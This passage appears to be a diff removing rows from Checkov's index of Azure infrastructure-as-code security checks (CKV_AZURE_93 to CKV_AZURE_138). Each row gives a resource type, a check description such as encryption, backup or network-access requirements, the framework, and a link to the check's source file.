-| 1779 | CKV_AZURE_93             | resource                         | Microsoft.Compute/disks                                                                          | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption                                                                                             | Bicep                   | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py)                                                                       |
-| 1780 | CKV_AZURE_93             | resource                         | azurerm_managed_disk                                                                             | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption                                                                                             | Terraform               | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryptionSet.py)                                                           |
-| 1781 | CKV_AZURE_94             | resource                         | Microsoft.DBforMySQL/flexibleServers                                                             | Ensure that My SQL server enables geo-redundant backups                                                                                                                                                  | arm                     | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py)                                                                                       |
-| 1782 | CKV_AZURE_94             | resource                         | Microsoft.DBforMySQL/flexibleServers                                                             | Ensure that My SQL server enables geo-redundant backups                                                                                                                                                  | Bicep                   | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py)                                                                                       |
-| 1783 | CKV_AZURE_94             | resource                         | azurerm_mysql_flexible_server                                                                    | Ensure that My SQL server enables geo-redundant backups                                                                                                                                                  | Terraform               | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py)                                                                           |
-| 1784 | CKV_AZURE_94             | resource                         | azurerm_mysql_server                                                                             | Ensure that My SQL server enables geo-redundant backups                                                                                                                                                  | Terraform               | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py)                                                                           |
-| 1785 | CKV_AZURE_95             | resource                         | Microsoft.Compute/virtualMachineScaleSets                                                        | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets                                                                                                                        | arm                     | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py)                                                       |
-| 1786 | CKV_AZURE_95             | resource                         | Microsoft.Compute/virtualMachineScaleSets                                                        | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets                                                                                                                        | Bicep                   | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py)                                                       |
-| 1787 | CKV_AZURE_95             | resource                         | azurerm_virtual_machine_scale_set                                                                | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets                                                                                                                        | Terraform               | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMScaleSetsAutoOSImagePatchingEnabled.py)                                           |
-| 1788 | CKV_AZURE_96             | resource                         | Microsoft.DBforMySQL/flexibleServers                                                             | Ensure that MySQL server enables infrastructure encryption                                                                                                                                               | arm                     | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py)                                                                                     |
-| 1789 | CKV_AZURE_96             | resource                         | Microsoft.DBforMySQL/flexibleServers                                                             | Ensure that MySQL server enables infrastructure encryption                                                                                                                                               | Bicep                   | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py)                                                                                     |
-| 1790 | CKV_AZURE_96             | resource                         | azurerm_mysql_server                                                                             | Ensure that MySQL server enables infrastructure encryption                                                                                                                                               | Terraform               | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLEncryptionEnabled.py)                                                                         |
-| 1791 | CKV_AZURE_97             | resource                         | Microsoft.Compute/virtualMachineScaleSets                                                        | Ensure that Virtual machine scale sets have encryption at host enabled                                                                                                                                   | arm                     | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py)                                                                               |
-| 1792 | CKV_AZURE_97             | resource                         | Microsoft.Compute/virtualMachineScaleSets                                                        | Ensure that Virtual machine scale sets have encryption at host enabled                                                                                                                                   | Bicep                   | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py)                                                                               |
-| 1793 | CKV_AZURE_97             | resource                         | Microsoft.Compute/virtualMachines                                                                | Ensure that Virtual machine scale sets have encryption at host enabled                                                                                                                                   | arm                     | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py)                                                                               |
-| 1794 | CKV_AZURE_97             | resource                         | Microsoft.Compute/virtualMachines                                                                | Ensure that Virtual machine scale sets have encryption at host enabled                                                                                                                                   | Bicep                   | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py)                                                                               |
-| 1795 | CKV_AZURE_97             | resource                         | azurerm_linux_virtual_machine_scale_set                                                          | Ensure that Virtual machine scale sets have encryption at host enabled                                                                                                                                   | Terraform               | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py)                                                                   |
-| 1796 | CKV_AZURE_97             | resource                         | azurerm_windows_virtual_machine_scale_set                                                        | Ensure that Virtual machine scale sets have encryption at host enabled                                                                                                                                   | Terraform               | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py)                                                                   |
-| 1797 | CKV_AZURE_98             | resource                         | azurerm_container_group                                                                          | Ensure that Azure Container group is deployed into virtual network                                                                                                                                       | Terraform               | [AzureContainerGroupDeployedIntoVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerGroupDeployedIntoVirtualNetwork.py)                           |
-| 1798 | CKV_AZURE_99             | resource                         | azurerm_cosmosdb_account                                                                         | Ensure Cosmos DB accounts have restricted access                                                                                                                                                         | Terraform               | [CosmosDBAccountsRestrictedAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBAccountsRestrictedAccess.py)                                                     |
-| 1799 | CKV_AZURE_100            | resource                         | Microsoft.DocumentDb/databaseAccounts                                                            | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest                                                                                                                        | arm                     | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py)                                                                                                   |
-| 1800 | CKV_AZURE_100            | resource                         | Microsoft.DocumentDb/databaseAccounts                                                            | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest                                                                                                                        | Bicep                   | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py)                                                                                                   |
-| 1801 | CKV_AZURE_100            | resource                         | azurerm_cosmosdb_account                                                                         | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest                                                                                                                        | Terraform               | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBHaveCMK.py)                                                                                       |
-| 1802 | CKV_AZURE_101            | resource                         | Microsoft.DocumentDB/databaseAccounts                                                            | Ensure that Azure Cosmos DB disables public network access                                                                                                                                               | arm                     | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py)                                                                       |
-| 1803 | CKV_AZURE_101            | resource                         | Microsoft.DocumentDB/databaseAccounts                                                            | Ensure that Azure Cosmos DB disables public network access                                                                                                                                               | Bicep                   | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py)                                                                       |
-| 1804 | CKV_AZURE_101            | resource                         | azurerm_cosmosdb_account                                                                         | Ensure that Azure Cosmos DB disables public network access                                                                                                                                               | Terraform               | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisablesPublicNetwork.py)                                                           |
-| 1805 | CKV_AZURE_102            | resource                         | azurerm_postgresql_server                                                                        | Ensure that PostgreSQL server enables geo-redundant backups                                                                                                                                              | Terraform               | [PostgressSQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgressSQLGeoBackupEnabled.py)                                                             |
-| 1806 | CKV_AZURE_103            | resource                         | Microsoft.DataFactory/factories                                                                  | Ensure that Azure Data Factory uses Git repository for source control                                                                                                                                    | arm                     | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py)                                                                         |
-| 1807 | CKV_AZURE_103            | resource                         | Microsoft.DataFactory/factories                                                                  | Ensure that Azure Data Factory uses Git repository for source control                                                                                                                                    | Bicep                   | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py)                                                                         |
-| 1808 | CKV_AZURE_103            | resource                         | azurerm_data_factory                                                                             | Ensure that Azure Data Factory uses Git repository for source control                                                                                                                                    | Terraform               | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryUsesGitRepository.py)                                                             |
-| 1809 | CKV_AZURE_104            | resource                         | azurerm_data_factory                                                                             | Ensure that Azure Data factory public network access is disabled                                                                                                                                         | Terraform               | [DataFactoryNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryNoPublicNetworkAccess.py)                                                     |
-| 1810 | CKV_AZURE_105            | resource                         | azurerm_data_lake_store                                                                          | Ensure that Data Lake Store accounts enables encryption                                                                                                                                                  | Terraform               | [DataLakeStoreEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataLakeStoreEncryption.py)                                                                       |
-| 1811 | CKV_AZURE_106            | resource                         | azurerm_eventgrid_domain                                                                         | Ensure that Azure Event Grid Domain public network access is disabled                                                                                                                                    | Terraform               | [EventgridDomainNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainNetworkAccess.py)                                                             |
-| 1812 | CKV_AZURE_107            | resource                         | Microsoft.ApiManagement/service                                                                  | Ensure that API management services use virtual networks                                                                                                                                                 | arm                     | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py)                                                                         |
-| 1813 | CKV_AZURE_107            | resource                         | Microsoft.ApiManagement/service                                                                  | Ensure that API management services use virtual networks                                                                                                                                                 | Bicep                   | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py)                                                                         |
-| 1814 | CKV_AZURE_107            | resource                         | azurerm_api_management                                                                           | Ensure that API management services use virtual networks                                                                                                                                                 | Terraform               | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIServicesUseVirtualNetwork.py)                                                             |
-| 1815 | CKV_AZURE_108            | resource                         | azurerm_iothub                                                                                   | Ensure that Azure IoT Hub disables public network access                                                                                                                                                 | Terraform               | [IoTNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/IoTNoPublicNetworkAccess.py)                                                                     |
-| 1816 | CKV_AZURE_109            | resource                         | Microsoft.KeyVault/vaults                                                                        | Ensure that key vault allows firewall rules settings                                                                                                                                                     | arm                     | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py)                                                         |
-| 1817 | CKV_AZURE_109            | resource                         | Microsoft.KeyVault/vaults                                                                        | Ensure that key vault allows firewall rules settings                                                                                                                                                     | Bicep                   | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py)                                                         |
-| 1818 | CKV_AZURE_109            | resource                         | azurerm_key_vault                                                                                | Ensure that key vault allows firewall rules settings                                                                                                                                                     | Terraform               | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesFirewallRulesSettings.py)                                             |
-| 1819 | CKV_AZURE_110            | resource                         | azurerm_key_vault                                                                                | Ensure that key vault enables purge protection                                                                                                                                                           | Terraform               | [KeyVaultEnablesPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesPurgeProtection.py)                                                         |
-| 1820 | CKV_AZURE_111            | resource                         | Microsoft.KeyVault/vaults                                                                        | Ensure that key vault enables soft delete                                                                                                                                                                | arm                     | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py)                                                                               |
-| 1821 | CKV_AZURE_111            | resource                         | Microsoft.KeyVault/vaults                                                                        | Ensure that key vault enables soft delete                                                                                                                                                                | Bicep                   | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py)                                                                               |
-| 1822 | CKV_AZURE_111            | resource                         | azurerm_key_vault                                                                                | Ensure that key vault enables soft delete                                                                                                                                                                | Terraform               | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesSoftDelete.py)                                                                   |
-| 1823 | CKV_AZURE_112            | resource                         | Microsoft.KeyVault/vaults/keys                                                                   | Ensure that key vault key is backed by HSM                                                                                                                                                               | arm                     | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py)                                                                                                     |
-| 1824 | CKV_AZURE_112            | resource                         | Microsoft.KeyVault/vaults/keys                                                                   | Ensure that key vault key is backed by HSM                                                                                                                                                               | Bicep                   | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py)                                                                                                     |
-| 1825 | CKV_AZURE_112            | resource                         | azurerm_key_vault_key                                                                            | Ensure that key vault key is backed by HSM                                                                                                                                                               | Terraform               | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyBackedByHSM.py)                                                                                         |
-| 1826 | CKV_AZURE_113            | resource                         | Microsoft.Sql/servers                                                                            | Ensure that SQL server disables public network access                                                                                                                                                    | arm                     | [SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py)                                                                 |
-| 1827 | CKV_AZURE_113            | resource                         | Microsoft.Sql/servers                                                                            | Ensure that SQL server disables public network access                                                                                                                                                    | Bicep                   | [SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py)                                                                 |
-| 1828 | CKV_AZURE_113            | resource                         | azurerm_mssql_server                                                                             | Ensure that SQL server disables public network access                                                                                                                                                    | Terraform               | [SQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerPublicAccessDisabled.py)                                                           |
-| 1829 | CKV_AZURE_114            | resource                         | Microsoft.KeyVault/vaults/secrets                                                                | Ensure that key vault secrets have "content_type" set                                                                                                                                                    | arm                     | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py)                                                                                               |
-| 1830 | CKV_AZURE_114            | resource                         | Microsoft.KeyVault/vaults/secrets                                                                | Ensure that key vault secrets have "content_type" set                                                                                                                                                    | Bicep                   | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py)                                                                                               |
-| 1831 | CKV_AZURE_114            | resource                         | azurerm_key_vault_secret                                                                         | Ensure that key vault secrets have "content_type" set                                                                                                                                                    | Terraform               | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretContentType.py)                                                                                   |
-| 1832 | CKV_AZURE_115            | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure that AKS enables private clusters                                                                                                                                                                 | Terraform               | [AKSEnablesPrivateClusters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEnablesPrivateClusters.py)                                                                   |
-| 1833 | CKV_AZURE_116            | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure that AKS uses Azure Policies Add-on                                                                                                                                                               | Terraform               | [AKSUsesAzurePoliciesAddon.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesAzurePoliciesAddon.py)                                                                   |
-| 1834 | CKV_AZURE_117            | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure that AKS uses disk encryption set                                                                                                                                                                 | Terraform               | [AKSUsesDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesDiskEncryptionSet.py)                                                                     |
-| 1835 | CKV_AZURE_118            | resource                         | azurerm_network_interface                                                                        | Ensure that Network Interfaces disable IP forwarding                                                                                                                                                     | Terraform               | [NetworkInterfaceEnableIPForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkInterfaceEnableIPForwarding.py)                                                 |
-| 1836 | CKV_AZURE_119            | resource                         | azurerm_network_interface                                                                        | Ensure that Network Interfaces don't use public IPs                                                                                                                                                      | Terraform               | [AzureNetworkInterfacePublicIPAddressId.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureNetworkInterfacePublicIPAddressId.yaml)                                 |
-| 1837 | CKV_AZURE_120            | resource                         | azurerm_application_gateway                                                                      | Ensure that Application Gateway enables WAF                                                                                                                                                              | Terraform               | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml)                                                     |
-| 1838 | CKV_AZURE_120            | resource                         | azurerm_web_application_firewall_policy                                                          | Ensure that Application Gateway enables WAF                                                                                                                                                              | Terraform               | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml)                                                     |
-| 1839 | CKV_AZURE_121            | resource                         | Microsoft.Network/frontDoors                                                                     | Ensure that Azure Front Door enables WAF                                                                                                                                                                 | arm                     | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py)                                                                                 |
-| 1840 | CKV_AZURE_121            | resource                         | Microsoft.Network/frontDoors                                                                     | Ensure that Azure Front Door enables WAF                                                                                                                                                                 | Bicep                   | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py)                                                                                 |
-| 1841 | CKV_AZURE_121            | resource                         | azurerm_frontdoor                                                                                | Ensure that Azure Front Door enables WAF                                                                                                                                                                 | Terraform               | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFrontDoorEnablesWAF.py)                                                                     |
-| 1842 | CKV_AZURE_122            | resource                         | azurerm_web_application_firewall_policy                                                          | Ensure that Application Gateway uses WAF in "Detection" or "Prevention" modes                                                                                                                            | Terraform               | [AppGWUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUseWAFMode.py)                                                                                       |
-| 1843 | CKV_AZURE_123            | resource                         | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies                                        | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes                                                                                                                               | arm                     | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py)                                                                                           |
-| 1844 | CKV_AZURE_123            | resource                         | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies                                        | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes                                                                                                                               | Bicep                   | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py)                                                                                           |
-| 1845 | CKV_AZURE_123            | resource                         | azurerm_frontdoor_firewall_policy                                                                | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes                                                                                                                               | Terraform               | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontdoorUseWAFMode.py)                                                                               |
-| 1846 | CKV_AZURE_124            | resource                         | azurerm_search_service                                                                           | Ensure that Azure Cognitive Search disables public network access                                                                                                                                        | Terraform               | [AzureSearchPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchPublicNetworkAccessDisabled.py)                                         |
-| 1847 | CKV_AZURE_125            | resource                         | azurerm_service_fabric_cluster                                                                   | Ensures that Service Fabric use three levels of protection available                                                                                                                                     | Terraform               | [AzureServiceFabricClusterProtectionLevel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServiceFabricClusterProtectionLevel.py)                                     |
-| 1848 | CKV_AZURE_126            | resource                         | azurerm_service_fabric_cluster                                                                   | Ensures that Active Directory is used for authentication for Service Fabric                                                                                                                              | Terraform               | [ActiveDirectoryUsedAuthenticationServiceFabric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ActiveDirectoryUsedAuthenticationServiceFabric.py)                         |
-| 1849 | CKV_AZURE_127            | resource                         | azurerm_mysql_server                                                                             | Ensure that My SQL server enables Threat detection policy                                                                                                                                                | Terraform               | [MySQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLTreatDetectionEnabled.py)                                                                 |
-| 1850 | CKV_AZURE_128            | resource                         | azurerm_postgresql_server                                                                        | Ensure that PostgreSQL server enables Threat detection policy                                                                                                                                            | Terraform               | [PostgresSQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgresSQLTreatDetectionEnabled.py)                                                     |
-| 1851 | CKV_AZURE_129            | resource                         | azurerm_mariadb_server                                                                           | Ensure that MariaDB server enables geo-redundant backups                                                                                                                                                 | Terraform               | [MariaDBGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBGeoBackupEnabled.py)                                                                       |
-| 1852 | CKV_AZURE_130            | resource                         | Microsoft.DBforPostgreSQL/servers                                                                | Ensure that PostgreSQL server enables infrastructure encryption                                                                                                                                          | arm                     | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py)                                                                           |
-| 1853 | CKV_AZURE_130            | resource                         | Microsoft.DBforPostgreSQL/servers                                                                | Ensure that PostgreSQL server enables infrastructure encryption                                                                                                                                          | Bicep                   | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py)                                                                           |
-| 1854 | CKV_AZURE_130            | resource                         | azurerm_postgresql_server                                                                        | Ensure that PostgreSQL server enables infrastructure encryption                                                                                                                                          | Terraform               | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLEncryptionEnabled.py)                                                               |
-| 1855 | CKV_AZURE_131            | resource                         | azurerm_security_center_contact                                                                  | Ensure that 'Security contact emails' is set                                                                                                                                                             | Terraform               | [SecurityCenterContactEmails.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmails.py)                                                               |
-| 1856 | CKV_AZURE_131            | parameter                        | secureString                                                                                     | SecureString parameter should not have hardcoded default values                                                                                                                                          | arm                     | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/parameter/SecureStringParameterNoHardcodedValue.py)                                                      |
-| 1857 | CKV_AZURE_131            | parameter                        | string                                                                                           | SecureString parameter should not have hardcoded default values                                                                                                                                          | Bicep                   | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/param/azure/SecureStringParameterNoHardcodedValue.py)                                                  |
-| 1858 | CKV_AZURE_132            | resource                         | Microsoft.DocumentDB/databaseAccounts                                                            | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes                                                                                                             | arm                     | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py)                                                                       |
-| 1859 | CKV_AZURE_132            | resource                         | Microsoft.DocumentDB/databaseAccounts                                                            | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes                                                                                                             | Bicep                   | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py)                                                                       |
-| 1860 | CKV_AZURE_132            | resource                         | azurerm_cosmosdb_account                                                                         | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes                                                                                                             | Terraform               | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisableAccessKeyWrite.py)                                                           |
-| 1861 | CKV_AZURE_133            | resource                         | azurerm_frontdoor_firewall_policy                                                                | Ensure Front Door WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell                                                                                                               | Terraform               | [FrontDoorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontDoorWAFACLCVE202144228.py)                                                               |
-| 1862 | CKV_AZURE_134            | resource                         | Microsoft.CognitiveServices/accounts                                                             | Ensure that Cognitive Services accounts disable public network access                                                                                                                                    | arm                     | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py)                                                     |
-| 1863 | CKV_AZURE_134            | resource                         | Microsoft.CognitiveServices/accounts                                                             | Ensure that Cognitive Services accounts disable public network access                                                                                                                                    | Bicep                   | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py)                                                     |
-| 1864 | CKV_AZURE_134            | resource                         | azurerm_cognitive_account                                                                        | Ensure that Cognitive Services accounts disable public network access                                                                                                                                    | Terraform               | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesDisablesPublicNetwork.py)                                         |
-| 1865 | CKV_AZURE_135            | resource                         | azurerm_web_application_firewall_policy                                                          | Ensure Application Gateway WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell                                                                                                      | Terraform               | [AppGatewayWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGatewayWAFACLCVE202144228.py)                                                             |
-| 1866 | CKV_AZURE_136            | resource                         | azurerm_postgresql_flexible_server                                                               | Ensure that PostgreSQL Flexible server enables geo-redundant backups                                                                                                                                     | Terraform               | [PostgreSQLFlexiServerGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLFlexiServerGeoBackupEnabled.py)                                           |
-| 1867 | CKV_AZURE_137            | resource                         | azurerm_container_registry                                                                       | Ensure ACR admin account is disabled                                                                                                                                                                     | Terraform               | [ACRAdminAccountDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAdminAccountDisabled.py)                                                                       |
-| 1868 | CKV_AZURE_138            | resource                         | azurerm_container_registry                                                                       | Ensures that ACR disables anonymous pulling of images                                                                                                                                                    | Terraform               | [ACRAnonymousPullDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAnonymousPullDisabled.py)                                                                     |
